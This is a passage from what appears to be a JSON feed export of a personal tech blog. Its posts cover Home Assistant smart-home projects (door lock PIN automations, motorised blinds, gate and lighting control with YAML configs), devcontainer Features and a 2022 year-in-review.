You could do this slightly differently by setting the user_type to non_access and not messing with the PIN, as that means they are recognised but don’t have access, but I find this works just as well.\nLastly, we wait for a minute to get a MQTT response, and update the provisioning state with the outcome, or set it to Failed if it times out.\nHere is it in action on the dashboard:\nI have a similar automation that will run when the PIN of any user in our system changes, such as the House Sitter PIN, which is randomly generated when we enable House Sitter access so each time we have a new PIN that only exists for the duration of their stay, and set the input_text.house_sitter_pin which then triggers an automation to activate/deactivate any PIN:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 alias: "Security: User PIN Change" mode: queued trigger: - platform: state entity_id: - input_text.lock_house_sitter_pin - input_text.lock_cleaner_pin - input_text.lock_guest_pin - input_text.lock_aaron_pin - input_text.lock_mel_pin - input_text.lock_mel_parents_pin - input_text.lock_aaron_parents_pin variables: user_id: >- {{ states(trigger.entity_id | regex_replace(find='_pin', replace='_id', ignorecase=False)) | int }} status_entity_id: >- {{ trigger.entity_id | regex_replace(find='_pin', replace='_status', ignorecase=False) | regex_replace(find='_text', replace='_select', ignorecase=False) }} action: - variables: pin: "{{ states(trigger.entity_id) }}" user_enabled: "{{ not is_state(trigger.entity_id, '') }}" - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: Pending - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": pin if user_enabled else None } } | to_json }} - wait_for_trigger: - id: active_confirmation platform: mqtt topic: zigbee2mqtt/<friendly name>/action payload: "{{ 'pin_code_added' if user_enabled else 'pin_code_deleted' }}" timeout: minutes: 5 - choose: - conditions: "{{ wait.trigger.id == 'active_confirmation' }}" sequence: - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: "{{ 'Registered' if user_enabled else 'Disabled' }}" default: - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: Failed This automation is largely the same as the cleaner one, but the trigger is different and it means that if anyone wants their PIN changed, all we have to do is update the appropriate helper and it should just work (this wouldn’t work for the cleaner as you’d either have to let them know of a new PIN each visit, or store their old PIN somewhere set it back to).\nConclusion There are a few other automations I’ve got around lock/unlock based on various conditions, but these are the most interesting ones I have and they have been working solidly for nearly six months.\nI always thought that I’d find a “smart” door lock useful, but this is one of those things that it’s just amazing how quickly we adapted to it. These days we don’t carry keys with us, unless it’s the car key, and then we only take the keyless entry FOB with us, we even traveled internationally and didn’t take a key, we just don’t need to, the PIN pad is so convenient. 
Even our kids have adapted to it, they quickly learnt my wifes PIN and now will race us home from school and fight over who gets to unlock the door.\nIt’s also been super convenient with house sitters, we haven’t had to work out the logistics to leave keys somewhere and then pick them up again, just issue a PIN and send through instructions on how to use it.\nSo far the only problem I’ve had is early on there would be times when the lock wouldn’t respond to requests or it wouldn’t report state correctly, meaning that it would tell us it’s unlocked at night but wouldn’t lock. While I wasn’t able to get a definitive answer (it’s not like I could pull the logs from the lock), the problem seemed to be that the lock bolt was rubbing on the striker plate and this was causing the lock to go into a fault mode and stop responding on ZigBee. Some adjustments to the striker plate and this seems to have resolved itself and we haven’t had problems for probably four months now.\nI still really like the initial options I looked at, such as the August and Danalock, but for day-to-day use, not having to get out a phone to unlock, and also not having to install a separate PIN pad, has made me realise that the Yale is really a great choice for the primary entranceway (I may get the others for the other deadbolts in the house, but that’s a low priority).\nUltimately, the Yale has been great and I would 100% recommend it to others. It was simple to install (well… get installed in my case!), it is easy to use (our 4 year old can do it) and it integrates nicely with Home Assistant on ZigBee (and I’d assume Z-Wave, I just haven’t tried it. Yale US have also said they are working on a Matter network module too) so you can automate it with no problems.\n", "id": "2023-02-13-building-a-smart-home---part-9-door-locks" }, { "title": "Building a Smart Home - Part 8 Motorised Blinds", "url": "https://www.aaron-powell.com/posts/2023-02-03-building-a-smart-home---part-8-motorised-blinds/", "date": "Fri, 03 Feb 2023 02:44:03 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Next job on the smart home, motorised blinds", "content": "We’ve got a lot of windows in our new house, for example the main bedroom has four windows. This means we have an awesome amount of natural light (we rarely need to turn lights on during the day!) but we’re forever having to go around opening and closing them.\nBecause of this, motorised blinds have always been an appealing idea to me so it’s time to tackle this aspect of the smart home.\nThe blinds we have are roller blinds and there’s two ways to motorise them, a motor within the blind itself or something you run the chain through. Since the blinds are brand new, I didn’t want to replace them by putting a motor into them, instead I decided to go with the simpler option of having a controller on the wall to run the chain through. I also feel this to be a less invasive solution and easier to walk back from in future.\nThere’s motors and then there’s motors Researching around, there are a lot of different options out there, some are ZigBee, some are Z-Wave, some are Bluetooth/Bluetooth Low Energy (BLE) and some are RF. You might have noticed wifi isn’t an option and that’s because wifi is not a particularly common protocol for these kinds of devices. 
Wifi requires a lot of energy (relatively speaking) so it’s not ideal for battery powered devices like these, and since we are going to have a motor which also requires power, we’re better off sticking to a low-powered communication protocol.\nWhile I was trying to work out which options to go with, a friend offered me three different ones that he wasn’t using (under the proviso that I don’t return them 🤣), Teptron Move, Soma Smart Shades 2 and Axis Gear. The first two are Bluetooth/BLE and the Gear uses ZigBee.\nQuick aside as I haven’t mentioned ZigBee before. ZigBee is a wireless protocol designed for low-powered devices and somewhat common in the smart home ecosystem. It works a bit like a mesh wifi network but operates separately to wifi (it does share 2.4GHz) but you need a hub of some sort that will turn the ZigBee signal into something consumable on your network/within Home Assistant. You’ll find plenty of stuff on YouTube about ZigBee if you want to learn more. Personally, I use a ConBee II for my ZigBee hub and ZigBee2MQTT in Home Assistant.\nThe Soma was a device that I had been looking at as one to get, it’s a small and compact unit, which wouldn’t be offensive on our windows, compared to a lot of options. It also has integration with Home Assistant, at least at a cursory glance (more on that later), so it seemed like it could fit the bill.\nThe Move is less appealing aesthetically as it’s quite a tall unit with buttons on the outside. It also didn’t have a solar panel, instead you need to rely on a wall plug or ensure you recharge the battery frequently. It also doesn’t have any HA integration that I have been able to find, which isn’t surprising as it’s a BLE device, meaning that it can only be controlled via the phone app or directly on the device. Because of this, I’ve not installed it anywhere, maybe in the future if I feel the desire to reverse engineer the BLE comms from the app (but probably not…).\nThe last of the ones I was given was the Axis Gear, which is both BLE and ZigBee and while the BLE aspect doesn’t have HA integration, using ZigBee it can be, woo!\nTime to get integrating.\nThey All Kind of Suck After following all the install guides for both the Soma and Gear (although I mounted them with 3M sticky strips rather than screws in case I want to get rid of them), the conclusion I came to is that the whole ecosystem just kind of sucks. Let’s start with the design of the control units.\nWhat I like about the Soma is that it’s small and sleek but the trade off from that is there are no external controls… so how do you control it? Via the companion mobile app. This means we’re going to be breaking one of our core rules, our blind isn’t going to be easy to control by just anyone.\nThe Gear is better in this regard, it has a modern design, which fits the look we’re going for, and a touch bar on the front with which you can control the blind position, meaning you don’t need to open the app once it’s initially set up to control the blind. 
It’s not perfect, you still need to know to look for the touch bar and if the blind is closed you have to reach around it to get to the controller, but it’s an improvement over the Soma… it sucks less.\nApps Both of these options require you to use BLE for the initial setup (the Axis Gear is ZigBee but it doesn’t support setting positions via ZigBee, it’s either via the app or using magic button combinations) and of course they have their own apps, which means I have two different apps to control my blinds.\nAnd this is the biggest pain point with motorised blinds, you either have to buy into a single platform or you end up with a range of apps that you’re controlling via. Long-term, this is likely to be less of a problem as you will find the one that works for you and go “all in” with that one, but while you’re investigating it sucks, and you’re either spending money on devices to mothball them later, or you don’t replace the less-desirable ones and suck it up.\nNeither of the apps are terrible, they find the blind easily enough, you can set positions, control the position, set schedules, etc. but really what I want is a single platform to control them all.\nEnter Home Assistant.\nHome Assistant Once the units were setup it was time to integrate them with Home Assistant. I started with the Soma as there’s a Soma Connect HA integration, awesome… no, no it wasn’t.\nTurns out that you don’t integrate the blinds directly, instead you need a Soma Connect hub to bridge the blinds into Home Assistant. Well that sucks.\nIt kind of makes sense. Up until recently there wasn’t native Bluetooth support in HA, so it couldn’t talk to the blinds, the Soma Connect does that and HA talks to it. But it meant that I would have to spend more for a device that only kind of fits what I want.\nThankfully, while digging around the Home Assistant forums I found out that the Soma Connect software can be installed on a Raspberry Pi (seemingly they were having supply issues with the official devices so the software was released). I’ve got a stack of Pi’s laying around, so I dusted one off, flashed an SD card with the Soma Connect software, booted it up and it just worked. Seriously, it just worked! Home Assistant picked it up, it’d already found the blind and connected with it, I was actually kind of shocked. So now I have a Pi that lives under the bed that is controlling one of the blinds.\nThe Gear is different in that it supports ZigBee and while their docs assume you’re using something like a SmartThings or Alexa as the ZigBee hub, I had no problems finding it using my ConBee II stick that is my ZigBee hub. You have to use the Axis app to enable “hub mode” (which then renders the app useless as I guess they disable BLE? seems odd that you can’t use both) and once that was done I found it to pair pretty quickly with my network and it appeared in Home Assistant as a cover entity so it can be opened/stopped/closed.\nSince I have both the Soma and Gear in our bedroom (and still two manual blinds… which we never open now 🤣) I created a cover group so we have a single entity in HA for “Parents blinds” that we can open/close them all at once.\nFor automations, they aren’t very exciting, at 9am the blinds will open and at 7pm they’ll close. 
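For what it’s worth, that’s about as simple as an automation gets - something along these lines, where cover.parents_blinds stands in for the cover group (a sketch with an illustrative entity ID rather than my exact config):

alias: "Blinds: Open parents blinds"
trigger:
  - platform: time
    at: "09:00:00"
action:
  # the cover group opens all the bedroom blinds at once
  - service: cover.open_cover
    target:
      entity_id: cover.parents_blinds
mode: single

with a matching one at 19:00 that calls cover.close_cover.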
I’m thinking of getting a humidity sensor in the bathroom to detect when the shower is on and close the blinds, since you have to walk past them to get to our walk in robe, but it’s pretty rare that we’re not done in the bathroom by 9am anyway (plus - gotta give the neighbours a show every now and then 😉).\nRandomly Failing Every now and then the blinds don’t work. Most of the time it’s the Soma that fails to respond so we’ll find the blinds still open when going to bed (annoying) or it just never opened (less annoying), meaning I either yell at the Google Home to trigger the blind or get out my phone and use the HA app. I haven’t dug into logs to work out what might be the problem, instead I may just add an automation that checks if the blind didn’t open/close to then rerun the command.\nI managed to pick up two more Axis Gear’s for the kids bedrooms and it took about three months to get them working. I mounted them on the wall but they weren’t being detected in the Axis app. Thinking they might be DOA I used a Bluetooth packet sniffing app and found that they were broadcasting on Bluetooth when being put into pairing mode, it was just my phone that couldn’t find them. I contacted Axis support, and after a lot of back and forth (yay timezones and holidays - was about six weeks of back and forth!) they concluded that they were probably on a really outdated firmware and the Android app can’t find it, instead I’d need to try the iOS app… but I don’t have any iOS devices… so I had to wait until we had someone over with an iPhone who was willing to let me install stuff on their phone (I don’t get why but apparently the iOS app can detect a wider range of firmware versions or something). I managed to find a victim volunteer and the Gear’s appeared immediately in the iOS app, I upgraded their firmware and then they connected to the Android app. I was then able to enable smart home mode and bring them into my ZigBee network (the fact I have to use the app for that is annoying, because if the app ever gets removed from the store I’m stuffed), well, one of them works and one of them doesn’t. I’ve got one that I need to keep trying to pair as it’s reporting that it’s connected but it fails to respond to commands (at least it can be manually controlled via the touch bar).\nFinal Thoughts We’ve now got four blinds operating across two different ecosystems and the conclusion I’ve drawn on motorised blinds is that this is a space that’s not approachable to the average home owner.\nWhen they work, they are great, in the morning one of our kids blinds opens and it’ll close again at night, the other doesn’t without manual control and it’s going to take me a while to work out the fix for it (and it might mean I have to buy more ZigBee routes as the network might be too stretched for it).\nAnd the price-point makes it very hard to get into, you either have to be willing to invest a few hundred dollars and accept that some of that will be a lost investment, or you have to hope you back a winner first time.\nSoma Smart Shades 2 As I said, these were one of the top contenders for me when I first started researching motorised blinds but having used them, they aren’t for me.\nWhile I thought the lack of external buttons would be great as it meant a smaller, sleeker unit, it fails the family test - there’s no way to control it without the app. 
Combine this with the need for a hub to bring it into HA (or have any remote control) and the cost starts to blow out.\nAdd on top that it randomly just doesn’t respond when it should, so it’s off the list of future investments. I probably won’t remove it, at least not for the time being as I don’t have an alternative device, so instead I’ll have to work around the problem with more software solutions.\nAxis Gear I have mixed feelings about this device. I like the design of it, how easy it is to use and that it integrates easily (well, easily-ish) into my ZigBee network. But when it doesn’t work, it’s a real pain. While writing this I noticed that both of the kids blinds failed to close tonight, one is reporting unavailable and the other is saying the battery is flat (despite the solar panel being plugged in). I think my ZigBee network is too thin at that part of the house so I may need another router, and I’ll have to dig into the battery problem (goes off to find the multimeter to test 12 AA batteries).\nBut the most frustrating part is they are no longer in production! The company has made a new device, Ryse, which I don’t think looks as good. It’s also dropped ZigBee support and the solar panel, meaning that you either need to have a wall socket nearby or buy their battery pack plus their hub, which doesn’t seem to have HA support anyway.\nYay, another dead end.\nWrapping Up Motorised blinds really appealed to me initially, but now having tried them out I’m rather… whelmed. I’m not overwhelmed by them nor am I underwhelmed, I’m just… whelmed.\nMaybe the ones that go into the blind itself rather than control the chain are a better investment, but with an entry price of around $200 per blind, that’s a heavy investment to do our whole house.\nSo, should you add it to your smart home priority list? Well, it depends how much money and effort you’re willing to invest in experimenting. Be warned, at one point I was using Wireshark to debug a BLE traffic dump… yeah, it got rough (I didn’t end up needing to do that, hence I didn’t mention it before).\n", "id": "2023-02-03-building-a-smart-home---part-8-motorised-blinds" }, { "title": "Building a Smart Home - Part 7 Motorised Gate", "url": "https://www.aaron-powell.com/posts/2023-01-16-building-a-smart-home---part-7-motorised-gate/", "date": "Mon, 16 Jan 2023 09:51:16 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "We installed a motorised gate, so guess what, I need to automate it!", "content": "In building our new house we decided to add a motorised gate across our driveway.\nUnsurprisingly, this is a gate running off a remote, which upon first inspection I believed was using RF on some frequency, and this sounds like it’s something I can automate with Home Assistant! After all, I’ve previously done some RF automations, so let’s get started.\nThe Controller The control unit we have installed is the BFT Deimos BT A 400 which connects to the gate via a rack and pinion system, with the rack being on the gate and the pinion on the motor. It has a sensor on the motor that is triggered when the gate reaches the open/close positions and stops the motor. 
This all runs on a track on our driveway, ensuring that it doesn’t, you know, go where it’s not meant to go.\nSo in reality, it’s a pretty simple system and sounds like a good fun thing to automate.\nAutomating the Gate With the gate we were provided with some Mitto remotes and going through the docs, they broadcast on 433MHz and that’s the same as the Broadlink RM4 Pro which I have controlling the ceiling fans.\nThe only problem is that now I need it to reach yet another location, and it’s already running a bit thin in reaching the full length of our house.\nBut it turns out that it’s actually a lot simpler than that. Part of the gate controller is the Hamal control board and it has some interesting headers on the board, a 24v DC +/-, as well as headers for external controllers to do things like start the motor. This sounds like a better option, it’s direct input to the motor, so we can send a signal directly, rather than relying on an external signal blast.\nWiring up the Controller I’ve still got some Shelly 1 devices left over from the lighting install, and this is the ideal device to use as it can run on 240v AC or 24v DC, and the motor exposes positive and negative headers for 24v DC (as well as 240v AC, but you don’t want to play with 240v AC!).\nAfter unplugging the motor I grabbed spare wires to connect the L and N terminals to the 24v DC headers and the Shelly is ready to power on, next we need to wire up the IO of the Shelly to the headers 61 and 60 respectively.\nI’m not using the SW header on the Shelly as I don’t have an external input to control the relay switching.\nWith power connected back to the controller the Shelly broadcast its AP and was ready to be adopted onto the wifi network, sweet!\nShelly Configuration For this Shelly, it’s not a switch like you’d use in lighting, it’s just activating momentarily to trigger the motor to start doing its thing, so the concept of on and off don’t really make sense. Instead, we’ll configure this Shelly as a Momentary Button Type, but since we never want it to be in the on state for long, I added an Auto Off timer with a 1s delay, meaning that once the relay turns on it then turns off again straight away.\nThis is a simple trick to work around how these style of controllers work, on just tells the motor to start doing what it should be doing based off what it’s currently doing/current state is; if the gate is open, it’ll close; if it’s closed, it’ll open; if it’s moving, it’ll stop.\nLooking at the headers Hamal control board I think you could do something smarter, but that’s not really of concern to me.\nAdding to Home Assistant Home Assistant will find the Shelly as soon as it’s on the network and it can be integrated easily, but we just have it as a switch, and a switch that pretty much always says it’s turned off. What we’re lacking is a way to know if the gate is opened or closed, and to do that we’ll add a contact sensor.\nI used the Aqara Door Sensor (again, I have a bunch laying around from other projects… this seems to be a smart home trend 😅) which I’ve attached between the gate and the pole the gate is on, so it’s somewhat hidden and protected from the elements.\nOnce adopted on my ZigBee network I have something that reports open/close state of the gate, so we can bring it all together.\nAdding a Cover Template Entity To merge the two entities, our contact sensor and switch, to represent something that can do open/close/stop, we’ll use a Template Cover entity. 
Here’s the YAML for the gate:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 cover: platform: template covers: roller_gate: device_class: gate friendly_name: "Roller gate" value_template: >- {% if is_state('binary_sensor.driveway_gate_contact','on') %} Open {% else %} Closed {% endif %} open_cover: service: switch.turn_on data: entity_id: switch.roller_gate close_cover: service: switch.turn_on data: entity_id: switch.roller_gate stop_cover: service: switch.turn_on data: entity_id: switch.roller_gate icon_template: >- {% if is_state('binary_sensor.driveway_gate_contact','on') %} mdi:gate-open {% else %} mdi:gate {% endif %} The entity configuration is reasonably straightforward, to open/close/stop we use the switch.turn_on service in Home Assistant, which triggers our Shelly to on, forcing an action, before it turns itself off again. We then determine current state by looking at the contact sensor entity and reporting the right text (and icon for good measure).\nThere we go, it’s appearing in Home Assistant and we can trigger it to watch magic happen.\nConclusion This turned out to be a reasonably easy project to undertake because the BFT controller is well designed for integrating an external controller in. I hadn’t seen this exact approach done, the Home Assistant forums had this post that used another component of the BFT product line that I don’t have, but it was enough to help me get started.\nIt’s also very similar to wiring up a garage motor, which I’ve done in the past (and there are plenty of tutorials online for).\nIs this really that useful though? Presently, no, not really. I don’t really have anything that will intelligently decide if the gate needs to be opened or closed, so it’s more a case of “I can do this” than anything else. Sure, there’s a basic automation it’s used with to make sure it’s closed at the end of the day, but really, that’s not running that frequently as we just close it from the remote in the car. Maybe if/when we have a car that’s integrated into Home Assistant (our car isn’t modern enough for that) there could be some smarts on “you’re about to drive, let me open” and have auto close when away/reopen on approach, but that’s not going to be happening for a while.\nAll in all, it was a fun project that saw a few fist pumps when I realised that it worked first time!\n", "id": "2023-01-16-building-a-smart-home---part-7-motorised-gate" }, { "title": "Simplifying devcontainers With Features", "url": "https://www.aaron-powell.com/posts/2023-01-11-simplifying-devcontainers-with-features/", "date": "Wed, 11 Jan 2023 04:36:59 +0000", "tags": [ "vscode" ], "description": "Sometimes we want to add things to a devcontainer, but how do we do that in the simplest way", "content": "As much as I love using devcontainers for all my local development (see here) there’s often repeatable things that I want to do in them which means I go back and copy RUN steps from previous Dockerfiles that I’ve created.\nEnter devcontainer Features A few months ago a new proposal was added to the open dev container spec (the spec that supports devcontainers in vscode) for custom features.\nFeatures are predefined scripts that you can add to your devcontainer.json file that will add something to the base image or existing Dockerfile that you are using for a devcontainer. 
By doing this, you simplify the base that you’re starting from and avoid a situation where you are having to add development tooling to what could be a shared image across environments.\nUsing Features for my blog The repo that my blog lives in has had a devcontainer definition for nearly two years (see!), and in that time I’ve maintained a Dockerfile that uses the base image and a devcontainer.json file that describes how to use it within VS Code.\nOver time I’ve added some more to the RUN command in the Dockerfile that installed more default installs, and it just kind of did it’s thing.\nToday though, I decided to port it across to using Features, and you’ll find the commit here.\nThe primary changes in the commit are moving away from maintaining a Dockerfile myself to using a generic base image, mcr.microsoft.com/devcontainers/base:bullseye to be precise, and adding the following Features:\n1 2 3 4 5 6 7 8 9 "features": { "ghcr.io/devcontainers/features/github-cli:1": {}, "ghcr.io/devcontainers/features/hugo:1": {}, "ghcr.io/devcontainers/features/node:1": {}, "ghcr.io/devcontainers/features/dotnet:1": { "version": "lts" }, "ghcr.io/jlaundry/devcontainer-features/azure-functions-core-tools:1": {} } Now when the container is rebuilt it’ll use the generic base image before layering on the features that I need, making it a clearer view of what has been modified in the container that I’m developing in.\nConclusion While my blog might be a reasonably trivial place to have a complex devcontainer, I see that using Features is a really simple way to reduce the complexity of the local container setup. It would be quite possible to reuse the Dockerfile that defines your production infrastructure and then layer some Features over that, allowing it to be used for both local development and production deployments, without the risk of developer tooling leaking out.\nThe other added bonus is that you can define your own Features and use them within your organisations repos. Check out the docs for insights on writing your own (it can be as simple as a JSON file and bash script!).\n", "id": "2023-01-11-simplifying-devcontainers-with-features" }, { "title": "2022 a Year in Review", "url": "https://www.aaron-powell.com/posts/2023-01-11-2022-a-year-in-review/", "date": "Wed, 11 Jan 2023 00:04:53 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, 1 year to the day since I did my 2021 post so I’m consistently late, woo!\nBlogging Towards the end of last year I read this post by Scott Hanselman about his decreased blogging, and it really resonated with me and how I’ve been feeling about blogging. While I haven’t blogged for quite as long, my oldest post is from 2008 (but it’s not actually my oldest, I’m missing some of my earliest stuff due to sloppy migrations), I have tried to be consistent but it’s fallen away over the last few years.\nIn 2022 I wrote 27 posts, which is close to as many as 2021 and some similarities in the content, such as a continuation of my GraphQL on Azure series.\nI also kicked off a new series about my smart home journey, which will continue throughout this year as I keep dabbling with stuff.\nPresenting In person conferences were back! 
🥳\nI was fortunate enough to present at three in person events this year, NDC Melbourne on VS Code and GraphQL with TypeScript (although that talk had some awesome demo failures 😅), DDD Perth about VS Code (yes, same talk as NDC Melbourne, nothing wrong with reusing the classics!), and NDC Sydney Remix and why to use GraphQL (those talks aren’t online yet).\nThere was a smattering of virtual talks as well at various user groups and online events, but I’m really glad to be back in person and able to connect with the community that way. Although I must admit, I had forgotten just how exhausting in-person events were, by the end of a multi-day in-person event, I’m very much ready for a rest!\nI’m hoping that we continue to see events coming back in 2023, I’ve already got a few locked in and am hoping to see some more user groups come back as well.\nBuilding a house We finally finished building the house we started in 2021, well by we I mean the building company we contracted, and moved in at the middle of the year. While for us it seemed like it was taking foreverrrrrrrrrrr it ran on time and shockingly on budget.\nIt’s nice to be settled back into our own space, I now have my own purpose-built office (with a giant 1.8m by 1.7m floor plan 😅), the kids have their own areas to play in and most importantly, I can tinker with smart home stuff!\nAs I said before, I’m blogging about my smart home but the blog is somewhat a trailing indicator to where we’re really at. Other things that I have integrated but yet to blog about is climate control with our connected HA, our digital door lock, and our garage door + automatic gate. So stay tuned, there’s more coming in that space.\nBurning out The big thing for me in 2022 was burning out and then coming to grips with having done that. I wrote about being burn out last week and the response that I got from the post was really heartwarming. So many people reached out both publicly and privately to check if I was ok, to share that they’ve been experiencing the same, and to offer support.\nSeveral people have told me that they found it really brave of me to share such a vulnerability in such a public way, but I really don’t see it like that, I’m just someone who is lucky enough to have a bit of a platform and if I can’t use it to destigmatise mental health issues, then what’s the point?\nMoving to something new As I was coming to grips with my burnout and looking at what I wanted to change to help me work through it, I realised that it was time to tackle some new challenges, and I’m excited to announce that that will be happening in 2023. Don’t worry, I’m not going far, I’m moving from the JavaScript team to the .NET team within Cloud Advocacy. This feels like a better fit for me, as much as I love JavaScript, .NET is where my heart always has been and I’m looking forward to tackling some of the challenges facing .NET developers in regards to Azure.\nBut yes, I do appreciate the irony that in my burnout post I talked about having a lot of managers to then go and have yet another manager come 2023, but I have already congratulated my new manager on the promotion they’ll receive in about 5 months time! 
🤣\nBring on 2023!\n", "id": "2023-01-11-2022-a-year-in-review" }, { "title": "Building a Smart Home - Part 6 Lighting", "url": "https://www.aaron-powell.com/posts/2023-01-05-building-a-smart-home---part-6-lighting/", "date": "Thu, 05 Jan 2023 05:32:32 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to get to the thing most people associate with a smart home, lights.", "content": "When we got our new house built, we decided to hold off putting in feature lights because we wanted to see the space first and then decide what we wanted in each of the areas as features. Fast forward a few months of occupancy and we’d selected our feature lights and booked the electrician to come and install them. And since we had an electrician coming to do some work, I felt it was an opportune time to get onto the next smart home job - lighting.\nNote: In Australia it’s illegal for anyone other than a licensed electrician to work on electrical wiring. Because I’m not a licensed electrician I won’t explain how the wiring is done, just what I’m doing once it is done.\nSmart light bulbs I dislike smart light bulbs for the most part because they rely on a powered circuit to work, which means that a wall switch will turn them off and you can’t use them in automations or for anything smart until you turn the switch back on. Because of this, I’ve actively avoided them in all but two places - our kids lamps. The kids lamps are in their rooms and I decided to get them smart bulbs so they can use the lamps as night light, or to have them do fun colours when they have friends over if the want. I got WiZ LED bulbs from Bunnings because they have an integration for Home Assistant out of the box. The one in my eldest’s room works pretty much flawlessly, whereas the one in my youngest’s room drops from the wifi network constantly (I’ve put an automation in place that sends me a push notification when it goes offline so I can reboot it - and yes, it has a static IP, I think it’s just a dodgy device).\nMaking dumb lights smart Keeping true to my ethos of Human Centred Design, we have to make the lights work for everyone, not just the household techy. Also, since we just built the house, and decided to get some nice quality light switches everywhere, I didn’t want to replace everything with the “futuristic” smart switches - I like the tactile feedback of flipping the switch, so that needs to keep working (not to mention people expect switch to work a certain way - hence the Human Centred Design bit).\nTo make the lights “smart” I decided to go with Shelly smart relays.\nI went with Shelly devices because I know a lot of folks already using them and they have great integration with Home Assistant. I picked up a deal via Oz Smart Things and got a bunch of Shelly 1 and 2.5 devices. We’ve got everything from a single switch to quad plates, so I need a range of devices. In hindsight, I should have gotten the 1PM instead of the 1 so that I’d get the power monitoring (the 2.5 have it), but really, it’s not that important.\nThe way the Shelly devices work is they sit between the switch and the light (or whatever is on the circuit) and when the switch is flipped you can control what the relay does. The simplest mode is to just change the state of the relay, so when the switch is flipped the relay turns on or off and the light turns on or off. 
Great, this solves the most basic UX aspect - the switch still works, but it gives the added benefit that I can also yell at the Google Assistants around the house to turn lights off.\nWhich Shelly mode to use There are two main settings that I tweak with my Shelly devices, the Power On Default Mode and Button Type.\nFor the Power On Default Mode I’ve set the switches all to be Restore Last Mode. This means that in the event of a power outage the state of the light will be restored to what it was when the power went out, so if it’s the middle of the night, we won’t all be suddenly woken up because the lights came on. You could alternatively use the SWITCH mode, but that will then rely on the position of the switch to dictate what the relay does, and since we don’t always use the switches to turn on/off the lights, you could end up in a situation where the lights come on unexpectedly.\nFor the Button Type, I originally set them to Toggle Switch, but that can see states getting out of sync, especially if you remotely change the relay state - now the switch and relay don’t match so you have to flip the switch to get it back to the right state (which is annoying and would likely cause confusion). Instead, I use the Edge Switch button type, which means that every flip of the switch changes the state, regardless of whether the switch is in the “on” or “off” positions (basically we don’t have “on” or “off” anymore on the switches).\nBut for a few of the devices I have set them to Detached Switch for the Button Type and this disconnects the switch from the relay, meaning that when the switch changes state, the relay doesn’t change state, you have to do something entirely “programmatically” now, and this comes to the automation’s.\nAutomations As “fun” as it is to be able to yell at the house and have a light turn on or off, the real reason I put the Shelly’s in was to be able to do some automations with them, so let me share some of the ones I’ve setup and that seem useful (and that my wife also finds useful!). So far they are all pretty basic, but they are tackling the little improvements to life that I want out of a smart home.\nAutomatic lights in storage We have a storage room under our stairs, very Harry Potter esq, and it’s got a light in there as there’s no window. We’d constantly be forgetting to turn the light off when closing the door, so a period of time later one of us would notice a faint glow under the door and turn it off. Not a major inconvenience or anything, but it’s one of those little things that would be nice to not have to think about.\nThe idea for this automation is that when the door is opened, the light turns on, and when the door is closed, the light turns off (with a little delay). To know when the door is opened I attached an Aqara Door Sensor to the top of the door. Now, when the door is opened, the sensor triggers and we can run an automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 alias: "Lighting: Storage" description: "" trigger: - platform: state entity_id: - binary_sensor.storage_door_contact to: "off" for: hours: 0 minutes: 0 seconds: 30 - platform: state entity_id: - binary_sensor.storage_door_contact to: "on" condition: [] action: - service: light.turn_{{ trigger.to_state.state }} entity_id: light.understairs mode: single Rather than having two automations, one for “open” and one for “close”, I combine them in a single automation and use the state of the contact sensor to call the appropriate light service in Home Assistant. 
I also added a delay on the door close of 30s so that if you close and then immediately need to go back in, you won’t be running the automation constantly.\nI use a similar automation to this for the garage internal door, with the additional condition that it only runs if the roller door is closed or it’s night time, as otherwise we don’t really need the additional lighting.\nMedia room lights For the media room I’ve setup an automation that when you pause (or stop) what’s playing on the TV it will turn the light on:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 alias: "Lighting: Media room on pause" description: "" trigger: - platform: state entity_id: - media_player.media_room_tv to: paused for: hours: 0 minutes: 0 seconds: 5 - platform: state entity_id: - media_player.media_room_tv to: "off" for: hours: 0 minutes: 0 seconds: 5 condition: - condition: state entity_id: light.media_room_light state: "off" - condition: state entity_id: light.media_room_downlights state: "off" action: - service: light.turn_on data: {} target: entity_id: light.media_room_downlights mode: single The idea behind this is that if you’ve paused what you’re watching, it’s likely that you’re about to get up anyway so bringing the light on means you can see where you’re going. I also added a 5s delay to try and catch some of the edge cases when swapping shows. I also added a condition to check that the lights are off, since there’s no reason to turn a light on if there is already a light on.\nThis automation isn’t perfect as it can be a bit aggressive in turning the lights on if you’ve moving from one streaming provider to another, or swapping from watching something to playing Xbox, but it’s better than nothing and I just need to do some debugging on the various states the TV reports to HA.\nLighting in the parents bedroom No, not that kind of lighting, I’m waiting for the LED strips to come… I’ve said too much 😳.\nSomething that often annoys me about bedroom lighting is that the light switch is near the door, but the bed is generally isn’t, so when you flip the lights off you walk across the room in the dark, hoping you don’t stub your toe on the end of the bed. Sure, you could install additional switches or turn on a lamp beforehand, but that’s not as “techy”.\nSo for the Shelly that’s controlling these lights I’ve set the Button Type to Detached Switch. Using this mode means you need to enable the Input sensors in Home Assistant. My sensor list looks like this for the Shelly 2.5 that controls the two sets of lights in our bedroom:\nNow the switches will change the state of the Input sensor, but that doesn’t change the relay, so the switch does nothing. Instead we need an automation to be triggered on the state change to the Input that will either turn the light on or will put a 10s delay before turning the light off. 
